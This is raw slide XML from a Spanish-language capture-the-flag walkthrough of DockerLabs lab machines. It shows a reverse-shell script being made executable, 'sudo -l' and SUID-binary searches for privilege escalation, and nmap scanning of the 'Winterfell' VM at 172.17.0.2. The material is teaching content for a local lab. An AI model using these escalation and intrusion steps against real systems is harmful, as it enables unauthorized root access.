                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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+x /temp/rev.sh</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ABE0EFC8-7AB9-4795-BB5C-B83E683651B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272629" y="1929254"/>
            <a:ext cx="2505673" cy="542591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4A55CBAC-079D-4D54-971E-9162392968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3831" y="2635857"/>
            <a:ext cx="3743268" cy="981541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FB8ACAAE-B222-459B-A498-88AF340270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2369" y="3781410"/>
            <a:ext cx="4858933" cy="201185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2887B50B-1FC5-4206-8C49-041FC36FAA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4193" y="4146607"/>
            <a:ext cx="4694327" cy="1426588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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BD0D9641-37BF-4902-B8B5-59E663586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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>14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457422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3A9460B-285B-4CCF-B7D2-0E7DFB501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b="1" dirty="0"/>
              <a:t>andy@172.17.0.2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642142F-6E52-4B5F-BDFA-07A3994436E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25000" lnSpcReduction="20000"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ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-la</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo -l</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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/ -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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f \( -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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perm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-4000 \) -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="6400" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6200" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6200" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 busca</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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lang="es-ES" sz="6400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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f : busca ficheros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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perm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 permisos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-4000: solo los SUID (Con este permiso, el usuario que ejecuta el archivo obtiene los mismos privilegios que el propietario del archivo).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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null:silencia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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errores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s-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Destacar de ahí el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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privileged_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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(root, tamaño más grande).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-E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s-ES" dirty="0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F77C86CE-BF9E-49C3-9D46-9321526603F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17251" y="2279494"/>
            <a:ext cx="4383404" cy="1402202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F04C2A85-12E9-4F48-AC5F-BFF822D6BF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4122" y="3877405"/>
            <a:ext cx="4629662" cy="1687789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F898D3BC-771B-4753-84B4-E2D820888A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2064" y="5760903"/>
            <a:ext cx="3127519" cy="609653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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D5859C10-BE2F-4DB4-95D6-BA1AD3808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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>15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563854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521B7AEB-2656-40EE-B495-7CD397DD24C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/>
              <a:t>WINTERFELL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Subtítulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769EFEBD-0423-4B5F-9907-A599897569A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b="1" i="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VM – Fácil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://dockerlabs.es/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352D32A6-1AED-4C1B-9A51-ABEFA2FD6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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>16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037421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9D916B-E280-4970-8F90-C8F0F064F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b="1" dirty="0"/>
              <a:t>Instrucciones de uso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15A59D3-67AC-4118-9D59-9814D746779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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Se descarga un zip que descomprimir, resultante en dos únicos archivos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Un auto_deploy.sh y un [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Nombre_VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Se ejecutan juntos mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> con permisos de sudo;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> auto_deploy.sh winterfell.tar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Se despliega la máquina, siempre la IP es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.17.0.2.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Marcador de contenido 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304D6BAC-69A8-4C19-B9CD-CF14A9CF66C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267450" y="2122683"/>
            <a:ext cx="4754563" cy="3892159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A6097B21-0101-438B-8AF5-444AC86FFF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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>17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508752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740A3F-8C53-4FC5-88D9-C44EFAFFB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b="1" dirty="0"/>
              <a:t>Reconocimiento de Puertos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A1D7A7C-61BE-4671-A282-C41C5BC2816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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Reconocemos los puertos abiertos disponibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p- --open 172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>En este caso son los puertos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>htttp</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netbios-ssn</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>microsoft-ds</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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39C5C37D-6404-489E-A536-D579C58507E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267450" y="2955900"/>
            <a:ext cx="4754563" cy="2225724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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4611460-08BC-4C59-A658-FC0377D27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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>18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071380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E1D6AC6-7C1E-4E78-9F59-547116A20C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b="1" dirty="0"/>
              <a:t>Reconocimiento de Puertos:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>22/tcp,80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1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248A258-0889-47F6-AF27-9F9C380F287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r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
